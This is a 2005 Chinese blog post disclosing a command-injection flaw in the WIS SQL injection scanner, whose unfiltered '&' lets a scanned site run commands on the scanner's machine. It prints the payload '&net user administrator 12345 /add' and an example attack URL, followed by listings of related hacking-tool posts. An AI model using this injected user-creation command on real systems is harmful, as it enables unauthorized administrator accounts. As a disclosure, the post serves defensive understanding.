小榕的WIS漏洞(ALLyeSNO) 【补充一下】

最新推荐文章于 2018-06-23 22:46:57 发布
最新推荐文章于 2018-06-23 22:46:57 发布
阅读量2.7k 收藏
点赞数
分类专栏: 权限提升 原创文章 文章标签: user date asp 工具 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/freexploit/article/details/277899
版权
博客介绍了WIS这一SQL漏洞扫描工具,它由小榕开发。该工具对&字符未严格过滤,导致可人为创建含&字符的语句。在扫描网站时,可在被扫描的asp代码中嵌入指令,如&net user administrator 12345 /add,从而执行任意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Term     : FreeXploiT

Author : ALLyeSNO

Date      : 2005-2-2

WIS是小榕开发的SQL漏洞扫描工具
WIS对&字符未做严格过滤 导致可以 人为的创建含&字符的语句 在扫描者机子上执行任意代码

&net user allyesno 12345 /add

不是wis&net user allyesno 12345 /add
而是 使用 wis对 某一个网站进行扫描的时候

我们可以利用wis未过滤& 在被扫描的网站代码 例如asp代码中嵌入&net user administrator 12345 /add

当wis对它进行扫描的时候 结果如下

http://www.target.com/sqlbug?=sql&net user administrator 12345 /add

本地执行wis &net user allyesno 12345 /add  是肯定可以的 因为&是把两段指令连在一起执行

黑客快速入门
相信自我
05-20 4365
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。 1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否
软件 流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
05-23
流光 Fluxay v5.0 IP漏洞扫描邮箱密码破解 多国语言绿色免费版
扫描工具--小工作室
注重长远 天天积累 cqujsjcyj
05-25 805
可扫描服务器漏洞   http://www.netxeyes.com/
SQL注入工具wed+wis全套下载
07-22
大名鼎鼎的小SQL注入工具包,有兴趣的朋友可以下载对网站的sql漏洞进行扫描测试,完善自己的网站漏洞
sql注入分析工具wed+wis
06-06
好用的sql注入分析工具
FreeXploiT-个人程序/文章发布时间
FreeXploiT
01-06 1958
工具以及文章将分为内部和公开两种 内部发布的 将永远不对外发布1.backdoor : 菜菜 发布日期:? 正式发布:否 DEMO发布:否功能简介:连接反弹和主动两种 一个简单的cmdshell 可对进程操作 后门无进程发布性质:无限期计划搁置发布性质:?2.隐形的克隆帐号 : ALLyeSNO 发布日期:? 正式发布:否 DEMO发布:是功能简介:无限期计划搁置发布性质:FreeXploiT内部
写的sql注入工具wed+wis.rar
10-11
在这个场景中,"小写的sql注入工具wed+wis.rar" 提供了一种可能的方式来检测和测试系统是否存在SQL注入漏洞。 首先,我们需要了解SQL注入的基本原理。当用户在Web表单中输入数据,这些数据通常会被拼接到一个SQL...
出品sql注入工具wed+wis使用分享
标题中提到的“小写的sql注入工具wed+wis”指的是由安全研究者小开发的一款安全工具,用于对网站进行SQL注入测试和检测漏洞SQL注入(SQL Injection)是一种常见的网络攻击技术,攻击者通过在Web表单输入或直接...
SQL注入-wis,wed工具
01-06
"小SQL注入-wiswed工具包"是专门用于检测和分析SQL注入漏洞的专业工具,旨在帮助安全研究人员和Web开发者识别并修复此类问题,而不是用于非法攻击。 wiswed是这个工具包中的两个主要组件: 1. wis(Web SQL ...
超好用的SQL注入工具(wed.exe,wis.exe)及用其入侵的实例!!!
热门推荐
王百万的Blog
04-14 3万+
用小的流光的时候,启动时介绍了两个工具:一个是wed.exe,另一个是wis.exe。这两个工具都是用来测试和进行SQL注入的,其中wed.exe是探测管理员的用户名和密码,而wis.exe用来探测后台的登录页面!注意:使用这两个工具的时候,一定要关闭防火墙,因为大部分的杀毒软件都会认为它们是病毒!!!!!wed.exe会首先探测是否能进行SQL注入,如果不会,会立即返回!行的话,进行了
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8365
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
DOS那一代的程序员现在都干嘛呢?
FreeXploiT
06-27 1万+
亿友论坛-DOS那一代的程序员现在都干嘛呢?(几年前的老帖子)          --  作者:包子夹蛋      --  发布时间:2005-5-10 14:01:00      --  DOS那一代的程序员现在都干嘛呢?(几年前的老帖子)      几年前的老帖子了,个人认为还不错,拿出来与大家分享      nnmm注:一群DOS年代老鸟的感言      [主题]DOS那一代的程序员现在都干
中国的顶级黑客-小
要饭's Blog
05-18 8788
收藏本文并不是因为崇拜,而是因为理解.网名:小性别:男年纪:31 婚姻:已婚资力:中国CAD/CAM协会会员,高级程序员格言:无论在现实或是网络中,我都是孤独的.......黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。个人站点:netxeyes.org====================================
Tracert In The Bat (ALLyeSNO)
FreeXploiT
10-15 1368
用法:程序默认检查5个跃点,以及使用当前目录的ip.txt文件为ip数据库你也可以指定跃点数以及ip数据库文件名tip tip 跃点数 ip数据库(tip 30 iplog.txt) rem Build and Test by ALLyeSNO in WIN2K&WINXP @echo off clsecho Build and Test by ALLyeSNO in WIN2K^&WINXP e
SQL注入工具使用
:)每天进步一点点
08-13 5756
你先打开菜单里“运行”,输入CMD打开DOS,然后再输入“cd 桌面”,然后回车,再输入“cd wis”,再回车,然后输入“WIS 网址”。这样就OK了注意:前提是你把小WIS文件夹放在桌面上。   转载:http://zhidao.baidu.com/question/211726678.html
教你使用visio 2013绘制产品流程图
u011159607的博客
06-23 6782
http://baijiahao.baidu.com/s?id=1582938032162779622&wfr=spider&for=pc1. 打开wisio2013后,将左侧形状区域切换到基本流程图形状,如下图:如果找不到基本流程图,可以在上方的搜索按钮中进行搜索,也可以点击更多形状进行查找。2. 选中左侧的流程形状,将其拖拽到纸张画布区域。如下图:3. 双击画布中的流程形状,进...
当我们完全控制CISCO路由器时能够做的事情
FreeXploiT
10-27 2383
|------------------------------- 翻译 by mix --------------------------------||----------------和以前一样,我要申明一下,我不是专业的翻译员-----------------||---------所以我也只能够根据我自己的理解,尽量符合原文意思的进行翻译----------||------------有能力的
windows网关详解 【了解网关的重要性,增加网络性能】【FreeXploiT综合文】
FreeXploiT
06-22 1万+
理解Windows中的路由表和默认网关   每一个Windows系统中都具有IP路由表,它存储了本地计算机可以到达的网络目的地址范围和如何到达的路由信息。路由表是TCP/IP通信的基础,本地计算机上的任何TCP/IP通信都受到路由表的控制。 理解路由表 你可以运行 route print 或 netstat -r 显示本地计算机上的路由表,如下图所示: C:/Documents
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值